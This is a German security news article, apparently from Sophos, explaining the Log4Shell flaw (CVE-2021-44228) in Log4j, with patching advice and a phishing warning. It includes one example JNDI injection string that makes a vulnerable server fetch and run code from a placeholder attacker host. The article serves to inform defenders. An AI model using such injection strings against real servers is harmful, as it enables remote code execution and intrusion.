Log4j-Alarm: was Sophos empfiehlt

Log4j Log4shell

Beitrag teilen

Java-Schwachstelle Log4j – Log4Shell – Was passiert ist und was nun zu tun ist. Nach Hafnium, Kaseya oder Solarwinds müssen sich Unternehmen erneut dringend mit einer hochkarätigen Server-Schwachstelle namens Log4j – Log4Shell auseinandersetzen. Sophos klärt die wichtigsten Fakten und sagt, was zu tun ist.

Der Name Log4Shell bezieht sich auf die Tatsache, dass der ausgenutzte Fehler in einer beliebten Java-Codebibliothek namens Log4j (Logging for Java) enthalten ist, und darauf, dass Angreifer, wenn sie die Lücke erfolgreich ausnutzen, praktisch eine Shell erhalten – also die Möglichkeit, jeden System Code ihrer Wahl auszuführen.

„Der entscheidende Punkt bei der Log4Shell-Attacke ist, dass der Server automatisch Code ausführt. Was auch immer ein Angreifer einem Server mit der Sicherheitslücke auftragen will, er kann es tun. Deshalb ist es enorm wichtig, so schnell wie möglich zu patchen, denn viele Leute da draußen, die nichts Gutes im Sinn haben, versuchen bereits auszutesten, welche Server noch angreifbar sind.“

Paul Ducklin, IT-Security-Experte bei Sophos

Und als ob diese Kommandogewalt noch nicht genug wäre, wurde die Sicherheitslücke als Zero-Day-Lücke getwittert, also als Sicherheitsfehler, der dokumentiert wird, bevor ein Patch zur Verfügung steht. Zudem wurde das Proof-of-Concept (PoC) auf GitHub veröffentlicht und das Problem damit weltweit bekannt, während es noch ungepatcht war. Entsprechend laut läuten seit Freitag weltweit die Alarmglocken und auch in Deutschland hat z.B. das BSI die Warnstufe Rot ausgerufen.

Unsachgemäße Eingabevalidierung

Die Schwachstelle, mittlerweile offiziell als CVE-2021-44228 bekannt, hat ihren Ursprung in einer harmlosen Anfragesendung an einen anfälligen Server, die einige Daten – beispielsweise einen HTTP-Header – einschließt, von denen die Cyberkriminellen erwarten (oder sogar wissen), dass der Server sie in seine Logdatei schreibt. Die so eingeschleusten Daten bilden eine versteckte „Sprengfalle“, da der Server, während er die Daten in ein für die Protokollierung geeignetes Format umwandelt, einen Web-Download als integralen Bestandteil der Erstellung des erforderlichen Protokolleintrags startet. Und diese Aktion hat es in sich, denn wenn die zurückkommenden Daten ein gültiges Java-Programm sind (eine .class-Datei, im Jargon), dann führt der Server diese Datei aus, um ihm bei der Generierung der Protokolldaten zu helfen.

Ungepatchte Log4j-Bibliothek ermöglicht Protokollierungsanforderungen

Der Trick besteht darin, dass ungepatchte Versionen der Log4j-Bibliothek standardmäßig Protokollierungsanforderungen ermöglichen, um allgemeine LDAP-Suchen (Verzeichnisdienste) sowie verschiedene andere Online-Suchen auszulösen. Dieses „Feature“ existiert, um dabei zu helfen, nicht sehr nützliche Daten, zum Beispiel Benutzer-IDs wie OZZJ5JYPVK, in menschenlesbare Informationen umzuwandeln, die in Ihrem Netzwerk sinnvoll sind, wie beispielsweise Peter Müller. Diese Anfragen erfolgen über ein häufig verwendetes Java-Toolkit namens JNDI, kurz für Java Naming and Directory Interface.

Dieses Vorgehen ist so lange tragbar, wie die protokollierten Daten, die eine Ausführung von serverseitigem Code auslösen können, auf Verzeichnisserver im eigenen Netzwerk beschränkt sind. Allerdings sind viel Server nicht entsprechend eingerichtet, und so könnten bösartige „Logsploiter“ versuchen, Text wie {$jndi:ldap://dodgy.example:389/badcode} in die Daten einzubetten, von denen sie erwarten, dass Unternehmen sie protokollieren und Server dabei automatisch

  • JNDI verwenden, um eine LDAP-Anfrage an den angegebenen Port (in unserem Beispiel 389) auf dem angegebenen nicht vertrauenswürdigen externen Server zu senden.
  • den nicht vertrauenswürdigen Inhalt in den Standort Badcode abrufen.
  • den vom Angreifer bereitgestellten Code ausführen, um „Hilfe“ bei der Protokollierung zu erhalten.

Einfach ausgedrückt, wird dieses Vorgehen im Fachjargon als nicht authentifizierte Remote Code Execution (RCE) bezeichnet. Ohne sich anzumelden oder ein Passwort oder Zugriffstoken zu benötigen, könnten Cyberkriminelle eine harmlos aussehende Anfrage verwenden, um Server dazu zu bringen, sich zu melden, ihren Code herunterzuladen und sich so mit ihrer Malware zu infizieren. Je nachdem, welche Zugriffsrechte ein Server auf das interne Netzwerk hat, kann eine solche RCE Cyberkriminellen dabei helfen, eine Vielzahl schädlicher Aufgaben auszuführen.

Und genau das macht die aktuelle Schachstelle Log4Shell so gefährlich. Angreifer können theoretisch Daten vom Server selbst abfließen lassen; Details über das interne Netzwerk erfahren, Daten auf dem Server ändern; Daten von anderen Servern im Netzwerk exfiltrieren; zusätzliche Hintertüren auf dem Server oder dem Netzwerk für zukünftige Angriffe einrichten oder weitere Malware wie Netzwerk-Snooper, Memory Scraper, Data Stealer und Cryptominer installieren.

Was jetzt zu tun ist!

Lizenzgeber Apache hat zu diesem Thema einen praktischen Sicherheitshinweis veröffentlicht. Sophos fasst außerdem noch einmal das Wichtigste zusammen:

  • Upgrade auf Apache Log4j 2.15.0. Wenn Sie Log4j verwenden, ist jede 2.x-Version von 2.14.1 und früher anscheinend standardmäßig anfällig. (Wenn Sie noch Log4j 1.x verwenden, ist ebenfalls ein Upgrade Pflicht, da es nicht mehr mit Updates versorgt wird).
  • Blockieren der Möglichkeit, dass JNDI Anfragen an nicht vertrauenswürdige Server stellt. Wenn Sie nicht aktualisieren können, aber Log4j 2.10.0 oder höher verwenden, können Sie den Konfigurationswert log4j2.formatMsgNoLookups auf true setzen, was das Ausgehen von LDAP und ähnlichen Abfragen von vornherein verhindert.
  • Überprüfung der verwendeten Java-Laufzeit. Der zugrunde liegende Java Build, den Sie nutzen, verhindert möglicherweise, dass dieser Fehler basierend auf seiner eigenen Standardkonfiguration ausgelöst wird. Apache listet beispielsweise Oracle Java 8u121 explizit als Schutz vor diesem RCE auf.

Betrifft die Sicherheitslücke auch private Nutzer?

Log4Shell bedeutet nicht nur Alarmstufe Rot für Unternehmen, sondern auch private Nutzer können durchaus von den Auswirkungen der Lücke betroffen sein. Das gilt vor allem dann, wenn Privatpersonen Cloud-Server nutzen, die von einem Hosting-Unternehmen oder einem anderen Managed-Service-Provider betrieben werden – sei es ein Blog, ein Forum oder die Familienwebsite. Hier gilt es nun zunächst einmal herauszufinden, ob diese Services angreifbar und wann Patches geplant sind. Aktuell macht es sicherlich mehr Sinn, auf den entsprechenden Webseiten nach Informationen zu suchen, da die Anbieter höchstwahrscheinlich momentan von Emails überflutet werden.

Auf Nachrichten von Dienstleistern achten

Zusätzlich sollte auf offizielle Sicherheitswarnungen von genutzten Online-Diensten im Postfach geachtet werden…aber auch hier gilt es, Vorsicht walten zu lassen! Wenn Nutzer Nachrichten über die aktuelle Sicherheitslücke erhalten – eventuell noch von einem prominenten Serviceanbieter, sollten sie nicht automatisch auf die in der Warnmeldung angegeben Links klicken und auch keine Telefonnummern ohne kritische Prüfung wählen. Medienwirksame Cyberattacken wie Log4Shell rufen schnell Trittbrettfahren auf den Plan, die die Angst der Nutzer für ihre Phishing-Attacken nutzen wollen. Im Zweifelsfall sollten Nutzer ihren eigenen Weg zur Informationsbeschaffung finden, indem Sie URLs, E-Mail-Adressen oder Telefonnummern verwenden, die sie bereits früher genutzt haben.

Mehr bei Sophos.com

 


Über Sophos

Mehr als 100 Millionen Anwender in 150 Ländern vertrauen auf Sophos. Wir bieten den besten Schutz vor komplexen IT-Bedrohungen und Datenverlusten. Unsere umfassenden Sicherheitslösungen sind einfach bereitzustellen, zu bedienen und zu verwalten. Dabei bieten sie die branchenweit niedrigste Total Cost of Ownership. Das Angebot von Sophos umfasst preisgekrönte Verschlüsselungslösungen, Sicherheitslösungen für Endpoints, Netzwerke, mobile Geräte, E-Mails und Web. Dazu kommt Unterstützung aus den SophosLabs, unserem weltweiten Netzwerk eigener Analysezentren. Die Sophos Hauptsitze sind in Boston, USA, und Oxford, UK.


 

Passende Artikel zum Thema

Robotik, KI oder Firmenwagen – wo Manager Cybergefahren sehen

Deutsche und Schweizer C-Level Manager sehen besonders für das Home-Office Handlungsbedarf, um dort in der Zukunft sensible Daten besser zu ➡ Weiterlesen

Ohne Notfallplan ist der Datenverlust vorprogrammiert

In der Umfrage des Uptime Institute geben 60 Prozent der Unternehmen an, dass sie in den letzten drei Jahren einen ➡ Weiterlesen

Win 11 Copilot+ Recall: Microsoft baut auf Druck IT-Security ein

Kurz nachdem Microsoft Chef Satya Nadella Copilot+ Recall für Windows 11 vorgestellt hatte, haben Experten in Sachen IT-Security vernichtende Urteile ➡ Weiterlesen

CISOs unter Druck: Sollen Cyberrisiken herunterspielen

Die Studienergebnisse zum Umgang mit Cyberrisiken in Unternehmen haben es in sich. Die Trend Micro-Studie zeigt: Drei Viertel der deutschen ➡ Weiterlesen

APT-Gruppen: Viele Router als Teil riesiger Botnetze 

In einem Blogbeitrag analysiert Trend Micro wie Pawn Storm (auch APT28 oder Forest Blizzard) und andere APT-Akteure Router kompromittieren und ➡ Weiterlesen

Microsofts Copilot+ Recall: Gefährliche Totalüberwachung?

Microsoft sieht es als Superservice, Security-Experten als Super-GAU: Microsofts Copilot+ Recall für Windows 11 zeichnet alle 5 Sekunden die Tätigkeiten ➡ Weiterlesen

Ransomware: 97 Prozent der Betroffen sucht Rat bei Behörden

Enorm viele Unternehmen wenden sich bei einer Cyberattacke an behördliche Einrichtungen. Der aktuelle Sophos State of Ransomware Report bestätig, dass ➡ Weiterlesen

KI unterstützt sicheres Datenmanagement

Heutzutage nutzen Cyberkriminelle Künstliche Intelligenz (KI), um ihre Angriffe noch wirkungsvoller zu gestalten. Um diese Attacken effektiv abzuwehren, ist es ➡ Weiterlesen